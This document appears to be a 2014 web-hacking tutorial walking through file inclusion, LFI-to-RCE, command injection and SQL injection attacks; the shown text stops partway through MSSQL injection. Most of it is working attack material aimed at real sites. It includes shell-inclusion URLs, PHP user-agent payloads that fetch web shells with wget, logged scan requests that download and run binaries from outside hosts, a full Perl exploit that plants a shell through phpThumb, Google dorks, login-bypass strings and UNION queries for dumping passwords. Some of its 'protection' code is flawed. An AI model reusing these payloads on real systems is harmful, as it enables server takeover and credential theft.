Web Hacking Tutorial with Remote File Inclusion and Local File Inclusion Exploits

2014
Root
Root-XSecurity
1/1/2014
Web Servers & ApplicationHacking

Part 1
Web-hacking Attacks
This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from this here.
Guide content :
 Remote file inclusion
 Localfile inclusion
 LFI 2 RCE
 LFI 2 RCE Using Firefox
 Localfile download
 Full path disclosure
 CommandInjectionVulnerability Exploit
 SQL Injection - with load file
 MSSQLInjection
 Blind SQL Injection
 Postgre SQLInjection
 Error based Postgre SQLInjection
 SQL Injection on ASPX
 Dot net nuke
 XSS
 CRLF
 CSRF
 Server Side Includes | Server Side Inclusion
 Symlink Attack
 Sql injection String & Union based
 Xpath Injection
 LDAP Injection
 DNS Zone TransferVulnerability Exploit
 Oracle Padding Attack Using Brup Suite

So let’s get started !
Remote file inclusion :
1) RFI
RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses
functions include () to include some files for a GET method. This file is usually in txt format
pages whose content is printed.
Example:
Code:
http://www.site.com/index.php?page=home
Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt
format.
2) Vulnerable script
Code:
<?php
$page = $_GET['page'];
include($page);
?>
3) Exploiting vulnerability
We have site:
Code:
http://www.site.com/index.php?page=home
Now instead of home we gonna use our shell.
So we get:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?
If site is vulnerable it should show shell with list of files from site you are attacking.
4) Null byte bypass
In some scripts there is a weak protection which is gonna include file and add html extension, or
some other:
Code:
<?php
include($page.".html");
?>
In that case we are going to use null byte bypass(%00).
Everything after %00 would not count and use. We are also using %00 for picture upload bypass
as php, but I am not going to talk about it.

So link should look like this:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00
5) Protection script
Script should look like this:
Code:
<?php
include($page);
?>
So we are going to add some stuff to protect it:
Code:
<?php
if(file_exists("pages/".$page) {
include($page);
}
?>

Local file inclusion :
1) LFI?
LFI can be used on sites like:
Code:
http://link.com/index.php?page=
by adding
Code:
../../../../../../etc/passwd
(sometimes you have to add %00 on passwd).
2) Finding vulnerable sites:
Code:
index.php?page=
index.php?option=
search.php?word=
3) Checking site vulnerability:
Find some site and use
Code:
../../../../../../../../../../../etc/passwd
or
Code:
../../../../../../../../../../../etc/passwd%00
When you enter this to link you get this:
Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List
Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-
exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
ntp:x:103:106::/home/ntp:/bin/false
snmp:x:104:65534::/var/lib/snmp:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
which means that site is vulnerable.
4) proc/self/environ
Now we want to see if we have access in /proc/self/environ over site so we can upload a shell on
the site.

Instead of etc/passwd%00 we are going to put /proc/self/environ
If page prints this:
Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac
HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%
2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Serv..........
then proc/self/environ is enabled so we can upload the shell.
5) Shell uploading
To upload the shell we need Mozilla Firefox:
Code:
http://www.mozilla.com/firefox/
Add-on Tamper Data:
Code:
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Open site etc:
Code:
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/s
elf/environ
Tools > Tamper Data
click Start Tamper then refresh page and in user agent put next code:
Code:
<?system('wget www.link.com/shell.txt -O shell.php');?>
Click OK. To access shell use: Code:www.link.com/shell.php

LFI 2 RCE
 Find LFI vulnerabel site.
 Check its link.

 Do ->
http://www.site.com/index.php?lien=../../../../../../../../../../../../pro
c/self/environ
 Open command prompt and run script LFI2RCE.exe [C:lfi2rce.exe "< Website vuln link>"]

 Type Command -: id
 Type Command -: uname -a
 Type Command -: ls -l
 Now Upload a "shell" in this web server so,
 Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip
 Type Command -: unzip c99.txt.zip
 Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (where assuming
"out14ws.php" is Public HTML page & move command will copy c99.txt Text to
"opt14ws.php")
 Type Command-: ls | grep Out14ws "OR " ls | grep c99
 Type Command -: pwd [ To check present working directory of shell ]
 Then open full link of your shell in yoyr web browse you get :
http://website-name/path/path/c99.php
http:// website-name/path/path/opt14ws.php.php

LFI 2 RCE Using Firefox
 Check the target if it is vulnerable to lfi or not
 Eg. http://www.site.com/index.php?page=../../../../../../../../etc/passwd -: or
http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00
 Now. See -:
http://www.site.com /index.php?page=../../../../../../proc/self/environ-: or
http://www.site.com /index.php?page=../../../../../../proc/self/environ%00

 Now in address bar or firefox type : " about:config "
 Find -: accessibility.browsewithcaret > rightclick > new > string
 NEW STRING VALUE : general.useragent.override
Press " Ok " new box will pop up ask for : ENTER STRING VALUE

 ENTER STRING VALUE : <?php phpinfo(); ?>
It is general.useragent.override
After it u will see something like :

 Now check the php version and Information while refreshing the vulnerable link or page.
Find disabled information -: disable_functions - system, passthru, shellexec, popen,
escapshellcmd, proc_open etc...
 Once u have checked the php info go to : " about:config " page and see for
"general.useragent.override " and ENTER STRING VALUE :
 <pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print
"$outputn";}?></pre>
 Behalf of - YOUR COMMAND - Type some command like - ls -a , uname -a, cd
/etc/passwd, pwd, etc...
 For uploading Shell You can type command : wget http://www.site.com/c99.php
Note : after putting command for getting its output you have to refresh the page or vulnable link.

 Command -: ls -la
 Output : On refreshing page

Local file download :
1) LFD?
LFD (Local File Download) is vulnerability in script which is used to download files using GET
method, but you can also use it with POST method using add-on Tamper Data.
Code:
http://site.com/download_file.php?file=notepad.exe
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
3) Vulnerability check
To check if script is vulnerable we are gonna try to download etc/passwd.
So instead of:
Code:
http://site.com/download_file.php?file=notepad.exe
We are gonna use:
Code:
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd
If it starts to download and if it open file in text editor it look something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
Script is vulnerable!
NOTE: If it is a windows server use boot.ini instead of etc/passwd.
Now when we know that script is vulnerable, we want to see which files are on host. You can do
this on this way:
Code:
http://site.com/download_file.php?filel=../

../ is gonna back us one directory backward and download file.
1.1 It is possible when it download file and open in text editor to print file list in directories.
1.2 or it is either possible to download file but when it is opened in text editor file is empty.
In case 1.1 we dont have to guess file name and directory and we can download whatever we
want.
In case 1.2 we must guess file name and directory and we can download only files which name
we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website
Copier).
5) Protection script
We have script mentioned at start:
Code:
<?php
readfile($file);
exit;
}
?>
by adding if(file_exists("download/".$file) we are gonna secure script.
So it should look like:
Code:
<?php
if(file_exists("download/".$file)) {
readfile($file);
exit;
}

Full path disclosure :
This method let you over errors in file or over errors made by programmers to let you see which
files are in which directories, over it you can't directly hack site, it just let you help while
hacking.
It is useful because it can help you in faster and easier hacking, also it can help you with Local
File Inclusion (LFI), when folder name is changed, or some other file. You can findout using
FPD.
There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important.
1st is over array, by adding square brackets on link like this one:
Code:
index.php?page=home
To finish vulnerability attack is to add [] on destined place:
Code:
index.php?page[]=home.
That will give you error like this:
Code:
Warning: include(blah/errors.php) [function.include]: failed to open stream:
No such file or directory /home/insekure/public_html/index.php on line 211
From this you can see on site is it exists directory blah.
2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java-
injection, by adding java code on site you will get error.
This is a javascript code:
Code:
javascript:void(document.cookie='PHPSESSID=');
add that in your address bar and hit enter, now when page is refreshed you will get this error:
Code:
Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/example/public_html/thems/errors.php on line 58
then try to open directory thems on site, that should list you files in that directory.
Protection:
Most simple way to protect from this attacks is to turn-off error reporting.
edit or add:
Code:
error_reporting(0);

Command Injection Vulnerability Exploit
 phpThumb()"fltr[]" Command Injection Vulnerability Exploit Scans
 Automatic Shell upload
I. phpThumb() "fltr[]" Command Injection Vulnetability
since the 21th of December 2011 we’ve identified over 300 attempts to exploit the phpThumb() 'fltr[]'
Parameter Command Injection Vulnerability aka CVE-2010-1598 reported back in April 2010. Input
passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a
command line argument.
This can be exploited to inject and execute arbitrary shell commands via specially crafted requests.
Successful exploitation requires that "ImageMagick" is installed.
The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be
exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password".
Source: phpThumb() "fltr[]" Command Injection Vulnerability
By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level
commands as there aren't any input validation checks for the $command data in phpthumb.functions.php.
00.function ImageMagickThumbnailToGD() {
01....
02.foreach ($this->fltr as $filterkey => $filtercommand) {
03.@list($command, $parameter) = explode('|', $filtercommand, 2);
04.switch ($command) {
05....
06.case 'blur':
07.if ($this->ImageMagickSwitchAvailable('blur')) {
08.@list($radius) = explode('|', $parameter);
09.$radius = ($radius ? $radius : 1);
10.$commandline .= ' -blur '.$radius;
11.unset($this->fltr[$filterkey]);
12.}
13.break;

14....
15.$this->DebugMessage('ImageMagick called as
('.$commandline.')', __FILE__, __LINE__);
16.$IMresult = phpthumb_functions::SafeExec($commandline);
17.clearstatcache();
18.if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
19.@unlink($IMtempSourceFilename);
20.}
21.if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
22.$this->FatalError('ImageMagick failed with message
('.trim($IMresult).')');
23.$this->DebugMessage('ImageMagick failed with message
('.trim($IMresult).')', __FILE__, __LINE__);
24....
25.}
The issue was first addressed in version 1.7.10 and in version 1.7.11 the author added even more explicit
escaping of command line parameters according to the changelog.
escapeshellarg
The updated code uses the php escapeshellarg function and also limits the length of the input.
0.case 'blur':
1.if ($this->ImageMagickSwitchAvailable('blur')) {
2.@list($radius) = explode('|', $parameter);
3.$radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);
4.$commandline .= ' -blur '.escapeshellarg($radius);
5.$successfullyProcessedFilters[] = $filterkey;
6.}
7.break;
The problem with these extensions is that they use dangerous PHP functions which have the potential to
mess up a web hosting server and hack / exploit user accounts further up to root level.

Hackers, who use an insecure PHP script as an entry point to a web hosting server, can start unleashing
dangerous commands and take control over the complete server quickly.
Certain functions which are used in such scripts are considered as dangerous and are turned off in the PHP
configuration by certain responsible webhosts.
(Un)fortunately escapeshellarg is often part of the disabled functions so either way you can’t win except
by staying away from scripts that use these dangerous functions.
Find the location of your php.ini file. Open that file and look for "disable_functions" and replace it with
the following line:
disable_functions =
exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,
proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec
Source: Disabling dangerous PHP functions
3.5 php.ini & disabled functions
safe_mode = On
expose_php = Off
Enable_dl= Off
magic_quotes = On
register_globals = off
display errors = off
disable_functions = system, show_source, symlink, exec, dl,shell_exec, passthru, phpinfo,
escapeshellarg,escapeshellcmd
Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1
Exploit Scans
The queries are as follows:
GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l
/tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -
aux; &phpThumbDebug=9 HTTP/1.1
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755
/tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f;
&phpThumbDebug=9 HTTP/1.1
Breakdown of the requests / commands:
Exploit the vulnerability in phpThum.php fltr[] parameter.

GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg;
Display all information about files / directories - shows long listing information about the file / directory.
ls -l /tmp;
Download file barbut6 from bingoooo.co.uk and write output to file /tmp/barbut6.
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;
Usually default permissions are set to 0644, change file permission to 0755 for owner / group / others so
that the file can be executed.
chmod 0755 /tmp/barbut6;
Run / Excute file barbut6.
/tmp/barbut6;
The ps command gives a snapshot of the current processes.
On most systems derived from BSD, ps commonly runs with the non-standard options aux, where "a" lists
all processes on a terminal, including those of other users, "x" lists all processes without controlling
terminals and "u" adds a column for the controlling user for each process. Note that, for maximum
compatibility when using this syntax, there is no "-" in front of the "aux".
ps -aux;

Send SIGKILL to all perl processes. SIGKILL (Signal number 9) is a forced shutdown of a process. Note that
with SIGKILL the process will not have opportunity to clean up any system resources it was using (e.g.
temporary files etc.).
killall -9 perl;
Start perl and run / execute file f.
perl /tmp/f;
The output will be kept in the picture debug, created through the parameter phpThumbDebug = 9.
&phpThumbDebug=9
IP List
List of IP's involved in the scans
65.23.154.56 | 77.93.216.38 | 87.98.219.50 | 91.121.100.30 | 91.121.105.174 | 91.121.154.199 | 94.23.51.208 |
200.155.17.68
Targets
view source
print?
00.GET /cms/plugins/content/jthumbs/includes/phpThumb.php
01.GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php
02.GET /common/scripts/phpThumb/phpThumb.php
03.GET /phpThumb/phpThumb.php
04.GET /libs/phpThumb/phpThumb.php
05.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
06.GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php
07.GET /gallery/phpThumb/phpThumb.php

08.GET /wp-content/themes/victore/phpthumb/phpThumb.php
09.GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php
10.GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
11.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
12.GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php
13.GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
14.GET
/mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/
phpThumb.php
15.GET
/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/ph
pThumb.php
16.GET /modules/phpThumb/phpThumb.php
17.GET /lib/phpThumb/phpThumb.php
18.GET /manager/phpThumb/phpThumb.php
19.GET /thumb/phpThumb.php
20.GET /global/phpthumb/phpThumb.php
21.GET /components/com_hotornot2/phpthumb/phpThumb.php
22.GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php
23.GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
24.GET /staticfiles/phpThumb/phpThumb.php
25.GET /content/phpthumb/phpthumb.php
26.GET /class/phpthumb/phpThumb.php
27.GET /admin/phpThumb/phpThumb.php
28.GET /phpThumb.php
29.GET /admin/upload/phpThumb.php
30.GET /assets/components/phpthumb/phpThumb.php
31.GET /components/com_alphacontent/assets/phpthumb/phpThumb.php
32.GET /components/com_hotornot2/phpthumb/phpThumb.php
33.GET /components/com_alphauserpoints/assets/phpThumb/phpThumb.php

34.GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
35.GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
36.GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php
37.GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php
38.GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php
II. Automatic ShelluploadPerlScript
Note : Please change the c991.txt addressto your own shell address.
#!/usr/bin/perl
# Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload)
# Date:09/09/2013
# Author: D35m0nd142
# Vendor Homepage: http://phpthumb.sourceforge.net/
# Tested on: phpThumb 1.7.9
# Enter the website in this form -->
http://mobileworld24.pl/wpcontent/themes/mobileworld24/inc/phpThumb/
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit n";
print " (Automatic Shell Upload) n";
print " created by D35m0nd142 n";

print "======================================================n";
sleep(0.8);
print "Usage: perl phpthumb.pl <target> n";
exit(1);
}
if ($target !~ /http:///)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
#sleep(1);
print "======================================================n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit n";
print " (Automatic Shell Upload) n";
print " created by D35m0nd142 n";
print "======================================================n";
sleep(1.1);
print "[*] Sending exploit ... n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1');
#print "Enter the command to execute => ";
#$cmd = <STDIN>;
$website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; wget kratos91.altervista.org/c991.txt -O c991.txt ; &phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));

if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~
/Saving to: / ))
{
print "[+] Exploit sent with success. n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. n";
sleep(1.3);
}
print "[*] Controlling if the txt shell has been uploaded ...n";
sleep(1.2);
$cwebsite = "$target/c991.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ ))
{
print "[+] Txt Shell uploaded :) n";
sleep(1);
print "[*] Moving it to PHP format ... wait please ... n";
sleep(1.1);
$mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite = "$target/shell.php";

$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success && ($c2req->content =~ "/<b>Command execute</b></a>
::</b></p></td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req-
>content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ ))
{
print "[+] PHP Shell injected => '$cwebsite' :) n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from Txt to Php :( n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( n";
}

MYSQL Injection :
1) Dorks
Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp
I am going to use:
Code:
http://site.com/Admin_Login.asp
2) Logging
Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instead of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'
password' or 1=1 will the confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are going to be able to use admin panel.

SQL Injection :
1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database.
Vulnerable sites are in format:
Code:
http://www.link.com/index.php?id=
You can put anything else instead of index.
2) Finding vulnerable sites:
Best way to find vulnerable site is by using Google. We use these dorks to find sites:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check:
There are 2 ways to check if site is vulnerable.
1st way, we got link:
Code:
http://site.com/book.php?id=141
we are gonna add only ' at end of link so we get this link:
Code:
http://site.com/book.php?id=141'
2nd way, we got link:
Code:
http://site.com/book.php?id=141
we are going to add +and+1=2-- at end of link so we get:
Code:
http://site.com/book.php?id=141+and+1=2--
If some part of page disappear (picture, text or something) or any error like (You have an error in
your SQL syntax) site is vulnerable.
4) Finding number of columns
We can do it by using function order by, on link:
Code:
[http://site.com/book.php?id=141
adding +order+by+5--
Code:
http://site.com/book.php?id=141+order+by+5--

If page is opens normal there is more then 5 columns. Lets try with 10.
Code:
Now some part of site disappeared, which means that there's more then 5 and less then 10
columns. Lets try 7.
Code:
Page is opened normally which means that there is more then 7 and less then 10 columns. Lets
try 8.
Code:
on column 8 part of site disappear which means that there is 7 columns.
5) Finding vulnerable columns
Finding vulnerable columns is done with function union select all on link (in this case) we are
going to add +union+select+all+1,2,3,4,5,6,7--
Code:
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--
It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be
taken from any column. We are going to take from second column.
6) Finding database version
As I said we are gonna take data from second column. Instead of number 2 we are going to put
version() or @@version
Code:
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--
on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5
we have to guess database version.
We have version 5.0.51a-24+lenny5 which means that we don't have to guess name of table and
column.
7) Finding table names
If database version is 4 you wont be able to find name of table and column, you have to guess
their names. If database version is skip this step.
Names of some possible tables:
Code:

admin
admins
user
users
member
members
Names of some possible columns:
Code:
username
uname
un
user
name
nick
password
pw
pwd
passwd
If database version is 5 we can take name of table by doing next step: instead of number 2 we
going to put group_concat(table_name) and after number of last column
+from+information_schema.tables+where+table_schema=database()--
So we get this link:
Code:
http://site.com/book.php?id=-
141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_sc
hem a.tables+where+table_schema=database()--
Instead of number 2 it showed name of table, in this case date, book, users. We gonna take
columns from users table.
8) Finding column name
We found table name that we want and now from that we want to take columns. Instead of
group_concat(table_name) we are going to put group_concat(column_name) and instead of
+from+information_schema.tables+where+table_schema=database()-- we are going to put
+from+information_schema.columns+where+table_name=hex-- instead of hex we have to
encrypt in hex name of table.
Go to:
Code:
http://www.string-functions.com/string-hex.aspx
write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now
can see the columns:
Code:
141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_s
che ma.columns+where+table_name=0x7573657273--

9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a
stands for to make space between user and pw. Instead of
from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--
and we have link:
Code:
141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+us
ers--
and result e.g.:
Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga
which is users and passwords from this site.
10) Filter bypassing
In case when you write union+select+all says "not accessible" then change it to
UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish
*/)
On some sites there is also restricted database version so you can use unhex(hex(version()))
11) Site protection from SQL Injection
Just put this code in your script:
Code:
if(!is_numeric($_GET['id']))
{
echo 'It is gonna write text when some try to add /' or and+1=2';
}

SQL Injection - Load File :
You found site with SQL vulnerability, now you can try to access table mysql.user and file
privileges.
To so which is user and do we have user privileges we are adding 'user' instead of a vulnerable
column and at end of URL adding '+from+mysql.user--'.
It should look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.use
r--
If you get username, it means that you have access to mysql.user table and you can continue with
this tut.
Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)'
and of course '+from+mysql.user--'
Now when on page usernames and file priv. are listed you must find username which was written
at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y'
which is Yes. You have privileges.
Load File:
All we have to do is to write on vulnerable column load_file('FILE NAME').
We gonna try with /etc/passwd, so we type in vulnerable column 'load_file('/etc/passwd').
Which looks like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passw
d'),4--
If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file
name.
Hex e.g.
If we convert file name in Hex, before file name we will add '0x'
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632
f706173737764),4+from+mysql.user--
Hex code '2f6574632f706173737764' works for '/etc/passwd'.
It is recommended for Hex:
Code:

www.string-functions.com/string-hex.aspx
If you decide to convert file in Char then add 'load_file(char(converted file to char))'
Which looks like:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101
,116,99,47,112,97,115,115,119,100),4--
Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd'
Char converter:
Code:
http://pookey.co.uk/binary.php

MSSQL Injection :
I will use:
Code:
http://www.site.com/sr/page/member.asp?id=234
To find column number we gonna use order by function. We will add +order+by+5-- at end of
link.
Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5--
So we will get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5
is out of range of the number of items in the select list.
/sr/page/member.asp, line 38
which means that there is less then 5 columns, lets try with 4. We get same error, so we gonna
try with 3 and we get next error:
Code:
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'order'.
Which means that there is 3 columns.
To find database version we are using @@version.
Code:
http://www.site.com/sr/page/member.asp?id=-
234+union+select+all+1,@@version,3--
and we get:
Code:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008
19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on

Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
and from here we can see database version.
3) Finding table name
With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3
+from+information_schema.tables--
and we get:
Code:
nvarchar value 'Country' to a column of data type int.
and we can see that we have a table called 'Country'.
Now we have to find other tables. We are going to use not+in function. So we have link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3
+from+information_schema.tables +where+table_name+not+in('Country')--
and we get:
Code:
nvarchar value 'Admin' to a column of data type int.
and from here we can see that we have a Admin table.
It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this
case we will use where+table_name='Admin'--. So we have link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,
3+from+information_schema.colum ns+where+table_name='Admin'--
and we have error:
Code:

nvarchar value 'USERNAME' to a column of data type int.
From here we can see that we have column USERNAME. Now we need rest of the columns so
we gonna use again not+in function.
